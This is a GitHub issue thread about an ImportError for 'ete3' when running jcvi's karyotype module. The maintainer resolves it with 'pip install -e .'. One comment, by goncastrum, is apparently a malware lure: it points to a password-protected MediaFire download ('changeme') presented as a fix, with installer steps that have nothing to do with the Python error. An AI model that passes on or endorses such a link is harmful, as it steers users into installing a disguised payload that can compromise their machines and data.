### ISSUE TITLE
some error happen when i run python3 -m jcvi.graphics.karyotype seqids2 layout2 

### ISSUE THREAD

**Issue by xxwgdhd** [tanghaibao/jcvi#702]
Traceback (most recent call last):
  File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/karyotype.py", line 42, in <module>
    from .synteny import Shade, ymid_offset
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/synteny.py", line 50, in <module>
    from .tree import draw_tree, read_trees
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/tree.py", line 9, in <module>
    from ete3 import Tree
ImportError: cannot import name 'Tree' from 'ete3' (unknown location)
xxw@shpc-1691-instance-FFR0mwWs:~/biosoft/jcvi$ tree --help
-bash: tree: command not found
xxw@shpc-1691-instance-FFR0mwWs:~/biosoft/jcvi$ ete3 --version
-bash: ete3: command not found
xxw@shpc-1691-instance-FFR0mwWs:~/biosoft/jcvi$ python3 -m jcvi.graphics.karyotype
Traceback (most recent call last):
  File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/karyotype.py", line 42, in <module>
    from .synteny import Shade, ymid_offset
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/synteny.py", line 50, in <module>
    from .tree import draw_tree, read_trees
  File "/home/xxw/biosoft/jcvi/jcvi/graphics/tree.py", line 9, in <module>
    from ete3 import Tree
ImportError: cannot import name 'Tree' from 'ete3' (unknown location)

I do not know what the problem is, who can provide a little help, thank you.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by tanghaibao** [comment]
@xxwgdhd 

It looks like you are missing some Python dependencies, as you downloaded `jcvi` to a local directory:

```console
cd /home/xxw/biosoft/jcvi/
pip install -e .
```

The `pip` command should take care of all the missing dependencies.

**Comment by xxwgdhd** [comment]
Thank you. The problem has been fixed.
